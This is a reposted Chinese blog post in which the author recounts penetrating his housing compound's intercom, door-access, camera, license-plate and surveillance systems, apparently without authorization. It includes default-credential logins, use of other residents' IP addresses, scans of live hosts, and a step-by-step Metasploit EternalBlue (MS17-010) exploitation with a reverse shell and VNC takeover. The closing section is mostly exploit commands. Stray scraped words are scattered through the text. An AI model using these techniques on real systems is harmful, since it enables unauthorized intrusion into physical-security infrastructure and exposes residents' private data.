【轉】我是如何一步一步搞定小區的安防系統

時間 2019-12-06

標籤如何一步搞定小區系統欄目 Android 简体版

原文原文鏈接

前言

博主從小就是一個喜歡把事情簡單化的男人，可是現實老是在不經意間給你太多的驚喜，好比不停的搬家。php

博主從大學畢業到如今前先後後湊足了10次搬家運動，終於在第10次搬家的時候搬進了真正屬於本身的房子。python

15年末趁着房價最低的時候撿了個漏，一咬牙買下一套兩房半小居室，17年交房裝修，終於在18年初計劃搬進去住，博主我終於不再用搬家了，心情愉悅，住進去以後就開始忙乎各類雜事，因此這幾個月是很是的繁忙，博客也更得少，不過內容都在筆記裏面，慢慢更。ios

博主所購的小區對本身的智能化系統宣傳的很到位，因此閒下來的時候博主我就對小區的安防系統進行一次簡單的滲透，輕鬆拿下各類安防系統，這篇文章就來詳細的說明一下。git

準備

開始以前，博主須要對環境進行一個簡單的描述，以便你們可以在腦海中腦補一下整個滲透測試的過程，算是博主在線下滲透的一個例子吧，日後還有對整個商場各類店鋪各類的滲透過程，都會一一講解。github

好了，廢話就很少說了，我們既然是對網絡系統進行滲透測試，天然是得有一個入口，那這個入口在哪找呢？web

你們都知道，通常小區這種內部的網絡都是不直接鏈接到外網的，若是連那也是作了隔離，單獨有一個跳板來作轉發，這樣相對比較安全，可是正常狀況都是沒外網的，這種局域網系統有兩個突出的特色。sql

第一點就是維護人員過度的信任了內網的機器，認爲只要不鏈接外網就基本上沒事，高枕無憂，真是圖樣圖森破。shell

第二點就是沒有安全防禦軟件，就算有，那也是病毒特徵庫千百年不會更新，跟擺設同樣，沒有外網更新個毛線，這一點後面有機器能夠驗證。數據庫

因此具有這兩個特色的內部局域網是很是脆弱的，只要找到一個入口，基本上整個網絡就game over了，這個入口就很是的好找了。windows

衆所周知，如今的小區都是家家戶戶安裝了一個可視對講機，這玩意有時候挺好用，好比有客人來了，樓下大門門禁能夠用這玩意遠程開門，能夠語音對講，能夠看到對方的臉，還能夠錄音錄像，不只如此，還能跟家裏的煙霧報警器連起來，發生火災直接通知物業併發出警報，還能夠呼叫其餘住戶來一個免費的局域網語音聊天，功能能夠說是至關豐富了。

你猜的沒錯，我們整個滲透測試過程就從這個設備開始，先來看看我們這個厲害的可視對講機長什麼樣

微信圖片_20180521153517.jpg - 大小: 95.61 KB - 尺寸: 900 x 508 - 點擊打開新窗口瀏覽全圖

經過缺省弱口令進入工程模式，拿到ip地址，網關還有服務器地址

p80312-171124.jpg - 大小: 145.86 KB - 尺寸: 824 x 439 - 點擊打開新窗口瀏覽全圖

p80312-171153.jpg - 大小: 484.84 KB - 尺寸: 900 x 563 - 點擊打開新窗口瀏覽全圖

拆下對講機

p80319-164923.jpg - 大小: 316.73 KB - 尺寸: 900 x 681 - 點擊打開新窗口瀏覽全圖

我擦嘞，這網線也過短了吧，上工具

p80319-165232.jpg - 大小: 317.59 KB - 尺寸: 900 x 619 - 點擊打開新窗口瀏覽全圖

p80319-171804.jpg - 大小: 608.52 KB - 尺寸: x - 點擊打開新窗口瀏覽全圖

把網線進行延長方便接交換機、路由器、筆記本之類的設備，最後確認下通信是否正確

p80319-172001.jpg - 大小: 709.62 KB - 尺寸: x - 點擊打開新窗口瀏覽全圖

基本準備工做搞定以後就開始進行入侵滲透了。

掃描

根據以前擼光貓內網的經驗，這裏的IP地址確定是固定的，並且跟住戶號是綁定的，若是使用本身的iP地址進行測試，萬一出啥問題那不是很是的尷尬，既然如今不少業主都尚未入住，那麼IP地址池也有不少的空閒，就使用其餘住戶的IP地址吧，只要不衝突就行，說幹就幹，上裝備：

一個充電寶、一個路由器、一臺筆記本

微信圖片_20180521155613.jpg - 大小: 552.77 KB - 尺寸: x - 點擊打開新窗口瀏覽全圖

微信圖片_20180521155618.jpg - 大小: 635.75 KB - 尺寸: x - 點擊打開新窗口瀏覽全圖

微信圖片_20180521155623.jpg - 大小: 819.82 KB - 尺寸: x - 點擊打開新窗口瀏覽全圖

通電後設置路由器的固定IP

screenshot from 2018-05-18 19-06-00.png - 大小: 68.79 KB - 尺寸: 712 x 500 - 點擊打開新窗口瀏覽全圖

這樣筆記本經過無線wifi就能夠對IP段進行掃描了，我這使用的掃描軟件是Angry IP Scanner，圖形界面用起來很爽，並且速度也快

screenshot from 2018-05-18 22-10-17.png - 大小: 297.48 KB - 尺寸: x - 點擊打開新窗口瀏覽全圖

對192.165.0.1/16進行掃描發現存活主機1256個，爲了對IP地址快速分類，將存活的IP地址所有導出，編寫python腳本對ip的http響應頭進行分類，

最終分爲下面的這幾類：

第一類

mini_httpd/1.19 19dec2003

這一類機器是全部的門禁機，包含了住戶家裏的對講機，樓棟大堂的門禁機，車庫電梯的門禁機，小區大門的門禁機，經過ip地址以及admin / 123456弱口令能夠遠程控制，同時telnet也能夠鏈接，管理頁面功能很全，包括修改密碼，控制開門時間，控制門禁機密碼，呼叫住戶，呼叫物業中心，恢復出廠設置等等，功能豐富，界面以下

2018-05-21 16-15-41 的屏幕截圖.png - 大小: 122.37 KB - 尺寸: x - 點擊打開新窗口瀏覽全圖

屏幕截圖 2018-04-16 11.02.12.png - 大小: 88.98 KB - 尺寸: x - 點擊打開新窗口瀏覽全圖

第二類

DNVRS-Webs
Hikvision-webs/ 
App-webs/

這三種都是海康威視的監控探頭，登陸界面有如下幾種

2018-05-21 16-26-44 的屏幕截圖.png - 大小: 213.71 KB - 尺寸: x - 點擊打開新窗口瀏覽全圖

2018-05-21 16-33-36 的屏幕截圖.png - 大小: 98.26 KB - 尺寸: x - 點擊打開新窗口瀏覽全圖

2018-05-21 16-48-21 的屏幕截圖.png - 大小: 117.88 KB - 尺寸: x - 點擊打開新窗口瀏覽全圖

只有中間那種能夠無限次輸錯密碼進行爆破，其餘兩種都是輸錯五次就鎖定

第三類

Net Keybord-Webs

這是一個網絡鍵盤，一般用於操做監控的雲臺轉動，好比球機的操做杆，登陸界面

2018-05-21 16-32-57 的屏幕截圖.png - 大小: 34.85 KB - 尺寸: x - 點擊打開新窗口瀏覽全圖

密碼輸錯6次就鎖定。

第四類

Boa/0.94.13

這個就有意思了，這是車牌識別系統，車輛入庫的時候進行車牌識別，拍照存儲的機器，也是所有admin admin弱口令直接登陸，裏面存儲了些啥就很少說了，放兩張圖你們隨意感覺下

2018-05-21 16-38-26 的屏幕截圖.png - 大小: 31.41 KB - 尺寸: x - 點擊打開新窗口瀏覽全圖

2018-05-21 16-39-06 的屏幕截圖.png - 大小: 522.09 KB - 尺寸: x - 點擊打開新窗口瀏覽全圖

2018-05-21 16-39-29 的屏幕截圖.png - 大小: 65.98 KB - 尺寸: x - 點擊打開新窗口瀏覽全圖

經過對這幾種設備的歸類掃描，最終肯定了幾臺windows服務器

192.165.15.174
192.165.15.177
192.165.15.190
192.165.15.200
192.165.30.2

使用Nmap掃描結果以下

# Nmap 7.70 scan initiated Fri May 18 23:51:30 2018 as: nmap -iL something_ip.txt -oN scaned.txt -T4 --open
Nmap scan report for 192.165.15.174
Host is up (0.063s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
2383/tcp  open  ms-olap4
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown

Nmap scan report for 192.165.15.190
Host is up (0.046s latency).
Not shown: 992 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown

Nmap scan report for 192.165.15.200
Host is up (0.030s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Nmap scan report for 192.165.30.2
Host is up (0.064s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

# Nmap done at Fri May 18 23:51:46 2018 -- 5 IP addresses (4 hosts up) scanned in 16.25 seconds

很明顯，四臺機器都開了445端口，其中 192.165.15.174 開了1433端口，明顯是sql server數據庫，192.165.30.2還開了3389，這臺機器是在門禁機裏面見過，是門禁系統的服務器。

下面就重點對這幾臺機器入手，使用msf掃描下看是否是都存在smb漏洞（ms17_010），這漏洞在局域網真的超級好用，掃描截圖

screenshot from 2018-05-21 11-20-26.png - 大小: 224.4 KB - 尺寸: x - 點擊打開新窗口瀏覽全圖

發現只有192.165.15.174 不存在ms17_010，其餘三臺都存在，操做系統分別是

192.165.15.190 win7 sp1 x86

192.165.15.200 win7 sp1 x64

192.165.30.2 win7 sp1 x86

如今目標就很是明確了，可是有個問題，msf自帶的利用模塊只針對x64版本的操做系統，對於x86版本的系統只能使用其餘工具，emmmmm....

一陣思考以後，博主決定先搞定那臺64位win7，爲了可以正常的反彈shell回來，我把路由器改爲橋接模式，本機電腦設置固定IP，這樣個人機器就跟目標機器處於相同網絡拓撲，反彈天然無壓力

screenshot from 2018-05-19 00-01-27.png - 大小: 31.02 KB - 尺寸: 574 x 519 - 點擊打開新窗口瀏覽全圖

so...

msf的用法我這裏就很少說了，若是真不知道，能夠留言...給出一張run vnc的截圖，拿下監控系統

screenshot from 2018-05-19 01-47-41.png - 大小: 1.23 MB - 尺寸: x - 點擊打開新窗口瀏覽全圖

screenshot from 2018-05-19 01-55-37.png - 大小: 1.12 MB - 尺寸: x - 點擊打開新窗口瀏覽全圖

screenshot from 2018-05-19 02-30-00.png - 大小: 1.07 MB - 尺寸: x - 點擊打開新窗口瀏覽全圖

有趣的是這臺機器上竟然安裝了360安全衛士...

注意看上面一張圖的那個監控室，管理員面前有三臺機器，因此另外兩臺我下一步就要搞定。

上面說64位win7已經拿下，如今搞定32位機器，使用 https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit 這裏的Ruby腳本便可，須要注意的是若是本機是kali 64位的須要安裝 wine32，安裝方法是

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

並且全程操做須要在root下面，安裝完wine32後執行一下 wine32 cmd.exe 這樣會自動在/root下面建立.wine目錄，這個目錄msf會用到

使用

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

將腳本克隆到本地，而後把目錄下的deps 目錄和rb文件複製到msf的modules路徑下，這樣既可使用了（PS：我這裏只複製了rb腳本，deps沒有複製過去因此命令不太同樣），具體命令以下

msf > use  exploit/windows/smb/eternalblue_doublepulsar
msf exploit(windows/smb/eternalblue_doublepulsar) > set ETERNALBLUEPATH /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
ETERNALBLUEPATH => /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
msf exploit(windows/smb/eternalblue_doublepulsar) > set DOUBLEPULSARPATH /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
DOUBLEPULSARPATH => /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
msf exploit(windows/smb/eternalblue_doublepulsar) > set TARGETARCHITECTURE x86
TARGETARCHITECTURE => x86
msf exploit(windows/smb/eternalblue_doublepulsar) > set PROCESSINJECT  wlms.exe
PROCESSINJECT => wlms.exe
msf exploit(windows/smb/eternalblue_doublepulsar) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows XP (all services pack) (x86) (x64)
   1   Windows Server 2003 SP0 (x86)
   2   Windows Server 2003 SP1/SP2 (x86)
   3   Windows Server 2003 (x64)
   4   Windows Vista (x86)
   5   Windows Vista (x64)
   6   Windows Server 2008 (x86) 
   7   Windows Server 2008 R2 (x86) (x64)
   8   Windows 7 (all services pack) (x86) (x64)


msf exploit(windows/smb/eternalblue_doublepulsar) > set target 8
target => 8
msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost
set rhost  
msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost 192.165.15.190
rhost => 192.165.15.190
msf exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.165.7.11
lhost => 192.165.7.11
msf exploit(windows/smb/eternalblue_doublepulsar) > exploit